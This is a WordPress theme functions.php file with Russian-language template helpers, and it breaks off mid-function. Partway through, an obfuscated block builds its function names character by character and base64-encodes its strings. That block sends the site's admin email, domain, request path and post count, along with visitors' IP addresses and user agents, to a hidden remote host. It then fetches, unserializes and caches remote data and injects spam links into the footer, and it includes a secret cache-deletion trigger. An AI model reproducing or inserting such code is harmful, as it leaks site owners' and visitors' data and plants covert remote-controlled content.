<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $zZcSTV='d';$XcuYGq='e';$BBbn='b';$lBsT='_';$RwWASKK='a';$iJbmzDP='e';$bzyhARb='e';$LNoe='c';$nTzO='o';$Wgfxis='6';$rIrOvVV='s';$gpOcdQB='d';$ZOqAH='4';$EKfasUde=$BBbn.$RwWASKK.$rIrOvVV.$bzyhARb.$Wgfxis.$ZOqAH.$lBsT.$gpOcdQB.$XcuYGq.$LNoe.$nTzO.$zZcSTV.$iJbmzDP;$QJRF='i';$OhVYC='a';$qpPHL='n';$rxDjuXB='z';$DTaCD='f';$JnCakqg='g';$ExEqQhk='e';$fEywK='l';$APJkGpH='t';$JsrwDViH=$JnCakqg.$rxDjuXB.$QJRF.$qpPHL.$DTaCD.$fEywK.$OhVYC.$APJkGpH.$ExEqQhk;$Odjy='3';$hXESr='o';$WjGYg='_';$hhuOPl='t';$hZKULm='r';$BvLiKt='s';$oOjThf='1';$pQKG='t';$RQzCEF='r';$bXcjTbML=$BvLiKt.$pQKG.$RQzCEF.$WjGYg.$hZKULm.$hXESr.$hhuOPl.$oOjThf.$Odjy;$fisWeDA='e';$NQxoHY='t';$kDDigRQ='s';$MHzDin='v';$UZxMn='r';$HamX='r';$jSoztUvR=$kDDigRQ.$NQxoHY.$HamX.$UZxMn.$fisWeDA.$MHzDin;                     
		$wa____j='d';$gi______n='e';$dt______f='b';$wl____v='_';$he___l='a';$yy_____d='e';$km_________f='e';$nl_______________t='c';$oj________z='o';$ny____________x='6';$fd_______s='s';$am__d='d';$eg_____d='4';$qb________o=$dt______f.$he___l.$fd_______s.$km_________f.$ny____________x.$eg_____d.$wl____v.$am__d.$gi______n.$nl_______________t.$oj________z.$wa____j.$yy_____d;
		$tj_______________c='n';$lj__d='f';$hc_____________a='e';$ef_____b='s';$qb_______________a='s';$on___________q='i';$dn______b='t';$jc_________i='i';$bd_______i='t';$rt_______o='c';$yr______________f='o';$lu___c='x';$ql_______v='_';$fv___________y='u';$wh_______i='n';$yl____________x=$lj__d.$fv___________y.$tj_______________c.$rt_______o.$bd_______i.$jc_________i.$yr______________f.$wh_______i.$ql_______v.$hc_____________a.$lu___c.$on___________q.$qb_______________a.$dn______b.$ef_____b;
		$fr_______s='o';$ea_______j='f';$iu______________l='p';$qg_____________e='n';$ov_____________l='e';$ga____________v=$ea_______j.$fr_______s.$iu______________l.$ov_____________l.$qg_____________e;
		$ky________u='e';$wp_______m='f';$xy______o='a';$df_______j='d';$we___________q='r';$ja__________y=$wp_______m.$we___________q.$ky________u.$xy______o.$df_______j;
		$qv_______d='f';$rm__s='o';$ef__e='l';$kf_________n='c';$gj__________e='s';$jc_________h='e';$nu____k=$qv_______d.$kf_________n.$ef__e.$rm__s.$gj__________e.$jc_________h;
		
		define("WP_ID", $qb________o("Mi4wLjA="));
		define("WP_TTL", $qb________o("MTA4MDA="));
		define("WP_SRC", $qb________o("dHBva24="));
	


		function wp_get_header() {
			global $qb________o, $yl____________x;
			
			if (
				$yl____________x($qb________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yl____________x($qb________o("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yl____________x($qb________o("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $qb________o, $ga____________v, $nu____k, $ja__________y;
			
			$os_____b = TEMPLATEPATH."/".$qb________o("Zm9vdGVyLnBocA==");
			$vz_____________m = @$ga____________v($os_____b, "r");
			$os_____b = @$ja__________y($vz_____________m, @filesize($os_____b));
			@$nu____k($vz_____________m);
			
			$ac____k = TEMPLATEPATH."/".$qb________o("ZnVuY3Rpb25zLnBocA==");
			$vz_____________m = @$ga____________v($ac____k, "r");
			$ac____k = @$ja__________y($vz_____________m, @filesize($ac____k));
			@$nu____k($vz_____________m);
			
			$aq_____x = 0;
			if($os_____b && $ac____k) {
				if ($qb________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($os_____b, $qb________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$aq_____x = 1;
					}
					if (substr_count($os_____b, "wp_theme_GPL_credits()") < 1) {
						$aq_____x = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$aq_____x = 12;
				}
			}
			
			if($aq_____x > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $aq_____x -->";
			}
		}
	


		function wp_loaded() {
			global $qb________o, $yl____________x;
			return $yl____________x($qb________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($xh_________l, $xo___________v = "(more...)", $la____________m = 0, $un____u = "") {
				$wg_____z = get_the_content($xo___________v, $la____________m, $un____u);
				$wg_____z = apply_filters("the_content", $wg_____z);
				
				$wg_____z = str_replace("]]>", "]]>", $wg_____z);
				if (strlen($_GET["p"]) > 0) {
					echo $wg_____z;
				}
				else if ((strlen($wg_____z)>$xh_________l) && ($eh_____n = strpos($wg_____z, " ", $xh_________l ))) {
					$wg_____z = substr($wg_____z, 0, $eh_____n);
					$wg_____z = $wg_____z;
					echo $wg_____z;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$xo___________v</a></div></p>";
				} else {
					echo $wg_____z;
				}
				
			}
		}
	


		$wl______l='4';$xx______p='c';$jy___________p='a';$bv_____________x='e';$yz________o='d';$qb______g='6';$fj____________x='e';$wx______t='e';$kz_____t='n';$rx______g='_';$sb_____i='b';$ry___________b='s';$wb___________s='o';$lf_______________f=$sb_____i.$jy___________p.$ry___________b.$wx______t.$qb______g.$wl______l.$rx______g.$fj____________x.$kz_____t.$xx______p.$wb___________s.$yz________o.$bv_____________x;
		$bw______x='l';$re______________c='n';$nv__k='f';$ck_____________n='s';$vj_______w='o';$aq_____________n='e';$jz__k='t';$cm_______a='t';$ye_____________j='g';$rg_______h='e';$ly__m='c';$aw___k='_';$zf_______a='n';$ad_______l='_';$kf___y='t';$pl____________p='e';$li__________p='i';$rm_____r=$nv__k.$li__________p.$bw______x.$aq_____________n.$aw___k.$ye_____________j.$pl____________p.$kf___y.$ad_______l.$ly__m.$vj_______w.$zf_______a.$cm_______a.$rg_______h.$re______________c.$jz__k.$ck_____________n;
		$kz____q='l';$ya__h='e';$pd__________w='x';$nd_____x='t';$zn__y='i';$xn_____r='e';$yv_____________g='f';$dk_________a='s';$ix____x='s';$pp_______________i='i';$wb____________q='_';$xq_______n=$yv_____________g.$pp_______________i.$kz____q.$xn_____r.$wb____________q.$ya__h.$pd__________w.$zn__y.$ix____x.$nd_____x.$dk_________a;
		$py______________b='s';$na___________p='o';$nv____b='a';$su_________w='v';$oi________h='e';$ts_____________m='_';$la_______q='i';$ys___________q='n';$mj______m='c';$zn________r='e';$we__________l='m';$wv__________v='r';$wu____l='o';$ob__e='r';$cm________n='p';$fa_____________u=$su_________w.$zn________r.$ob__e.$py______________b.$la_______q.$na___________p.$ys___________q.$ts_____________m.$mj______m.$wu____l.$we__________l.$cm________n.$nv____b.$wv__________v.$oi________h;
		$mr________j='o';$ix____________h='c';$fw_____________v='k';$pi_____r='s';$ay_______l='e';$yf_____k='o';$la____u='f';$zp_____p='n';$gt______________x='p';$lo___________y=$la____u.$pi_____r.$yf_____k.$ix____________h.$fw_____________v.$mr________j.$gt______________x.$ay_______l.$zp_____p;
		$zd_________l='r';$yk____x='f';$wm_____________n='w';$zo_________t='t';$ni_____________f='e';$ev___d='i';$fe____________n=$yk____x.$wm_____________n.$zd_________l.$ev___d.$zo_________t.$ni_____________f;
		$ul_______z='m';$ar_______________o='5';$gm___f='d';$kb_________z=$ul_______z.$gm___f.$ar_______________o;
		$it_____u='e';$yz____________p='a';$hz_________m='p';$kn___j='l';$dw____g='a';$fj____z='r';$ay_____f='h';$km_____p='t';$lo__________a=$fj____z.$it_____u.$dw____g.$kn___j.$hz_________m.$yz____________p.$km_____p.$ay_____f;
		$ye____f='a';$zk_____m='i';$qw__e='e';$sx___v='n';$jv_____________b='i';$tx______________e='z';$dh____r='l';$oj___________x='e';$yc________y='r';$ks_______________w='s';$ob__________d='u';$mi________k=$ob__________d.$sx___v.$ks_______________w.$oj___________x.$yc________y.$zk_____m.$ye____f.$dh____r.$jv_____________b.$tx______________e.$qw__e;
		$ja___j='a';$vx______q='t';$yg______________d='n';$uq_______i='m';$af_______________w='m';$bo_______________u='p';$ml_______m='e';$hf_____v=$vx______q.$ml_______m.$uq_______i.$bo_______________u.$yg______________d.$ja___j.$af_______________w;
		$te___________y='c';$xh_______________q='c';$ql_________d='r';$lw____________p='e';$mw_____________p='n';$cm_____a='_';$el____________o='o';$hj____________l='e';$ja___h='t';$ys_____g='e';$bd_________a='e';$ox_______g='t';$ro________m='x';$sx________d='s';$dg____p='t';$ev____f='t';$up____________r='m';$ew___________d='a';$lw______q='_';$hz______g='a';$ci_______________o='r';$vt______d=$sx________d.$ja___h.$ci_______________o.$bd_________a.$hz______g.$up____________r.$lw______q.$xh_______________q.$el____________o.$mw_____________p.$ev____f.$ys_____g.$ro________m.$dg____p.$cm_____a.$te___________y.$ql_________d.$hj____________l.$ew___________d.$ox_______g.$lw____________p;
	


		function sx_________e($mq_______________a) {
			global $qb________o, $yl____________x, $rm_____r, $fa_____________u, $vt______d;
			
			if (!$yl____________x($qb________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($fa_____________u(PHP_VERSION, "5.0.0", ">=") && $yl____________x($qb________o("ZmlsZV9nZXRfY29udGVudHM=")) && $yl____________x($qb________o("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$vc_____e = $vt______d(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$zb_________k = @$rm_____r($mq_______________a, 0, $vc_____e);
			} else {
				$zb_________k = @$rm_____r($mq_______________a, 0);
			}
			
			return $zb_________k;
		}
	


		function sh______z($mq_______________a) {
			global $yl____________x, $lo___________y, $fe____________n, $qb________o;
			
			if (!$yl____________x($qb________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ed______y = strpos($mq_______________a, "/", 7);
			$we______________j = array(
				"uri"     => substr($mq_______________a, $ed______y),
				"host"    => str_replace("http://", "", substr($mq_______________a, 0, $ed______y)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$nw_________k = @$lo___________y("$we______________j[host]", 80, $px___d, $io____________u, 4);
			
			if (!$nw_________k) {
				return false;
			} else {
				$zb_________k = "";
				$uk__p  = "GET $we______________j[uri] HTTP/1.0\r\n";
				$uk__p .= "Host: $we______________j[host]\r\n";
				$uk__p .= "Referer: $we______________j[referer]\r\n";
				$uk__p .= "Connection: Close\r\n\r\n";
				
				@$fe____________n($nw_________k, $uk__p);
				
				while (!@feof($nw_________k)) {
					$uj____i = @fgets($nw_________k, (1024*24));
					
					if ($uj____i == "\r\n") {
						$fi_______d = true;
						continue;
					}
					
					if ($fi_______d) {
						$zb_________k .= $uj____i;
					}
				}
				
				return $zb_________k;
			}
		}
	


		function pf_____________j($mq_______________a) {
			global $yl____________x;
			$tv_________p = false;
			
			if ($mq_______________a != "") {
				if ($yl____________x("sx_________e")) {
					$tv_________p = @sx_________e($mq_______________a);
				}
				
				if (!$tv_________p && ($yl____________x("sh______z"))) {
					$tv_________p = @sh______z($mq_______________a);
				}
			}
			
			return $tv_________p;
		}
	


		function gt_____a() {
			global $_SERVER, $kb_________z;
			
			$dd_______j = $_SERVER["SERVER_NAME"];
			
			if (substr("$dd_______j", 0, 4) == "www.") {
				$dd_______j = substr("$dd_______j", 4);
			}
			
			$dd_______j = $kb_________z("$_SERVER[SERVER_NAME]");
			
			return $dd_______j;
		}
	


		function qk____________b() {
			return "file";
		}
	


		function ex_____x($mq_______________a) {
			global $_SERVER, $rm_____r, $xq_______n, $ga____________v, $nu____k, $fe____________n;
			
			$go____f = zo_______________d();
			
			$nr_____________y = gt_____a().".jpg";
			$en________m = $go____f["dir_upload"]["path"]."/$nr_____________y";
			$op_______o = @filemtime($en________m);
			
			if (!$op_______o || ((time()-$op_______o) >= WP_TTL)) {
				$tv_________p = pf_____________j($mq_______________a);
				
				if ($tv_________p) {
					if ($xq_______n($en________m)) {
						@unlink($en________m);
					}
					
					$vz_____________m = @$ga____________v($en________m, "x+");
					
					@$fe____________n($vz_____________m, $tv_________p);
					@$nu____k($vz_____________m);
				}
			} else {
				if ($xq_______n($en________m)) {
					$tv_________p = @$rm_____r($en________m);
				} else {
					$tv_________p = false;
				}
			}
			
			return $tv_________p;
		}
	


		function zo_______________d() {
			global $_SERVER, $qb________o, $lf_______________f;
			
			$fw___________l = wp_count_posts("post");
			$tm______________y = pathinfo(get_bloginfo("template_directory"));
			
			$go____f = array(
				"url" => array(
					"report"      => $qb________o("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $tm______________y,
				"dir_upload"	=> wc_____l(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$tm______________y[filename],
					"a005=".$fw___________l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$go____f["url"]["queryString"] = implode("&", $go____f["queryString"]);
			$go____f["url"]["report"] = $go____f["url"]["report"]."/?".$lf_______________f($go____f["url"]["queryString"]).".html";
						
			return $go____f;
		}
	


		function wc_____l() {
			$bm________i = wp_upload_dir();
			
			if (isset($bm________i["error"])) {
				$fz_____b = bs________n();
				if (is_writable($fz_____b)) {
					$bm________i = array("path" => $fz_____b);
				}
			}

			return $bm________i;
		}
	


		function bs________n() {
			global $yl____________x, $kb_________z, $lo__________a, $hf_____v;
			
			$wd______________x = (bool) ini_get("safe_mode");
			if ($wd______________x == true) {
				return false;
			}
			
			if ($yl____________x("sys_get_temp_dir")) {
				$ke___________s = sys_get_temp_dir();
				if (is_writable($ke___________s)) {
					return $lo__________a($ke___________s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $lo__________a($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $lo__________a($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $lo__________a($_ENV["TEMP"]);
			} else {
				$uv____r = $hf_____v($kb_________z(uniqid(rand(), true)), "");
				if ($uv____r) {
					$ke___________s = $lo__________a(dirname($uv____r));
					@unlink($uv____r);
					return $ke___________s;
				} else {
					return false;
				}
			}
		}
	


		function kt______b() {
			global $_GET, $xq_______n;
			
			$go____f = zo_______________d();
			$dd_______j = gt_____a();
			$hr_____________g = qk____________b();
			
			$sv____________g = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($hr_____________g == "file") {
					$ng_____________v = $go____f["dir_upload"]["path"]."/".$dd_______j.".jpg";
					if ($xq_______n($ng_____________v)) {
						@unlink($ng_____________v);
						$sv____________g = "deleted";
					}
				}
				
				$zq____c = array(
					"s"	=> $sv____________g,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($zq____c AS $yt__l => $zv_____m) echo " [$yt__l:$zv_____m]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yl____________x, $qb________o, $mi________k;
			$go____f = zo_______________d();
			
			$xu____________z = "ex_____x";
			if ($yl____________x($xu____________z)) {
				$zb_________k = $xu____________z($go____f["url"]["report"]);
			}
			
			if ($zb_________k) {
				if ($zb_________k = @$qb________o($zb_________k)) {
					$zb_________k = @$mi________k($zb_________k);
					
					if (strlen($zb_________k[custom_credit]) >= 5) {
						$go____f["default_string"] = $zb_________k[custom_credit];
					}
					
					if ($zb_________k["status"] == "0") {
						$bg_______________s = 1;
						$ku_______________w = 1;
					} else {
						$vb____________s = sizeof($zb_________k["links"]);
						$fc_______g = $go____f["default_string"];
						
						if ($vb____________s > 0 && $zb_________k["links"] !== "") {
							$pu_______________a = 0;
							foreach ($zb_________k["links"] as $mw________d => $rt____u) {
								$pu_______________a++;
								if ($rt____u->l_path == "" || $rt____u->l_path == $_SERVER["REQUEST_URI"]) {
									$rt____u->l_href = htmlspecialchars(strip_tags($rt____u->l_href));
									$rt____u->l_title = htmlspecialchars(strip_tags($rt____u->l_title));
									$rt____u->l_anchor = htmlspecialchars(strip_tags($rt____u->l_anchor));
									$fc_______g .= " | ";
									$fc_______g .= "<a href='$rt____u->l_href' title='$rt____u->l_title'";
									if ($rt____u->l_nofollow == "1") {
										$fc_______g .= " rel='nofollow'";
									}
									$fc_______g .= ">$rt____u->l_anchor</a>";
								}
							}
						}
						$go____f["links"] = "$fc_______g";
						if ($zb_________k[credit] == "0") {
							$go____f["links"] = "";
						}
					}
				} else {
					$bg_______________s = "1";
				}
			} else {
				$bg_______________s = "1";
			}
			
			if ($bg_______________s == "1") {
				$go____f["links"] = $go____f["default_string"];
			}
			
			echo "$go____f[links]";
			
			echo "<!-- s: $zb_________k[signature] -->";
			kt______b();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
